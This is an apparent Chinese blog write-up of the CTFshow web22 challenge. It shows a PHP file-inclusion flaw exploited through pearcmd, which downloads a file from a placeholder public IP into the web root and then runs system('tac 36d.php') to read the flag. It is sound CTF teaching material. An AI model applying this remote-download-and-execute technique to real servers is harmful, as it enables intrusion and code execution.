首页 > 其他分享 >CTFshow 萌新web22

CTFshow 萌新web22

时间:2023-08-29 16:00:56浏览次数:53  
标签:http eval package web22 字符串 CTFshow 萌新 download php

  • 源代码
<?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/\:|\/|\\\/i",$c)){
               include($c.".php");
       }
}else{
        highlight_file(__FILE__);
}
?> 

downloading 1.php ... Starting to download 1.php (Unknown size) ....done: 30 bytes Could not get contents of package "/var/www/html/1.php". 
Invalid tgz file. Download of "http://公网IP/1.php" succeeded, but it is not a valid package archive Invalid or missing remote package file download failed

最后访问1.php:
http://url.challenge.ctf.show/1.php
就会显示出flag了。

  • 原理:
  1. 构造两层嵌套,使用pearcmd 在下载并执行eval.php文件时,只是输出了一个字符串:
    2.这个字符串被写入到了eval.php文件中,但没有执行。
    3.当直接访问这个生成的eval.php文件时,外层的PHP代码会把里层的字符串当成PHP代码解析并执行。
    4.此时里层的system('tac 36d.php')就会被执行。

标签:http,eval,package,web22,字符串,CTFshow,萌新,download,php
From: https://www.cnblogs.com/Egcrying/p/17665041.html

相关文章

  • 计算机萌新的成长历程——初识C语言3
    今天我将继续分享数据类型的相关内容,本篇的主要内容将围绕short/int/long/longlong——整型数据类型的区别。在介绍他们的区别前,首先我们要先了解计算机中的单位,计算机的单位有以下几种单位:bit——比特位,计算机中最小的单位,1个比特位只能存放一个“1”或一个“0”byte——字节,1字......
  • 计算机萌新的成长历程——初识C语言2
    今天我将分享初识数据类型的学习体会和心得。刚刚开始接触数据类型,我学习到了以下几个数据类型char——字符数据类型short——短整型int——整型long——长整型longlong——更长的整型float——单精度浮点数double——双精度浮点数下面我将分享一下我对这些数据类型的理解。理解这......
  • 计算机萌新的成长历程——初识C语言
    2020.8.12晚上11:00我自己正式下定决心开始学习C语言,通过公众号“枫月软件”安装了VisualStudio2019Professional,随后在B站上跟着鹏哥的教学视频正式开始接触C语言。(PS:鹏哥的B站名称是“c语言编程学习”)51CTO网站也是通过视频才知道,并按照要求注册账号编写自己的第一篇博客。我......
  • ctfshow-web入门-信息搜集
    title:ctfshowweb入门信息搜集date:2023-08-1117:21:10categories:web刷题记录description:web1~web17web1f12查看源代码即可发现注释web2js前台拦截,右键查看源代码和f12均失效,两种方法均可1.设置中打开开发者工具2.url头部添加view-source:web3使用浏览器的......
  • ctfshow-web入门-sql注入-SELECT模块
    title:ctfshow-web入门-sql注入-SELECT模块date:2023-08-1322:06:17categories:web刷题记录description:web171~web172基础知识缺乏的推荐看我的sqli-labs系列web171单引号包裹,思路很简单。先看多少列1'ORDERBY3--+确定三列查看回显1'UNIONSELECT1,2,3--+......
  • 2023河南萌新联赛第(四)场:河南大学 C.卡片翻转
    传送门大致思路:1.发现一个很神奇的性质,无论是操作几的翻转,在同一行的始终在同一行,在同一列的始终在同一列。2.对于没有操作2的时候,我们只需要分开维护x轴和y轴哪两段区间翻转了即可,翻转用平衡树来写,这里选择的splay平衡树。3.对于有操作2的时候我们会发下进行两次操作2是会......
  • ctfshow--web入门--XXE
    ctfshow--web入门--XXEweb373源码<?phperror_reporting(0);libxml_disable_entity_loader(false); //允许加载外部实体$xmlfile=file_get_contents('php://input'); //使用php伪协议进行接收值,并进行文件读取if(isset($xmlfile)){$dom=newDOMDocument();......
  • ctfshow--web入门--文件上传
    ctfshow--web入门--文件上传web151(前端校验)题目中提示前端检验不可靠,应该对前端检验进行绕过检查前端代码进行修改,使php文件可以通过前端校验,成功上传后进行命令执行,找到flagweb152(content-type)通过前端校验后上传php文件显示文件类型不合规尝试抓包修改content-type......
  • 萌新学习c语言记录
    这几天学了~等的符号使用还有如1>>2这种移动(二进制)方式(应该可以这么说)这几天学习的东西都是一点新东西和一部分复习之前学习的东西而且新东西有点难还有不用第三个变量来交换另外两个变量的方式(但这种方式运行的时候有些缓慢)如inta=3;intb=5;a=a^b;b=a^b;a=a^b;这样就可以了但......
  • 萌新学习c语言过程
    今天把三子棋的代码写的差不多了,有些地方不尽人意感觉有时候还是有点迷。......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99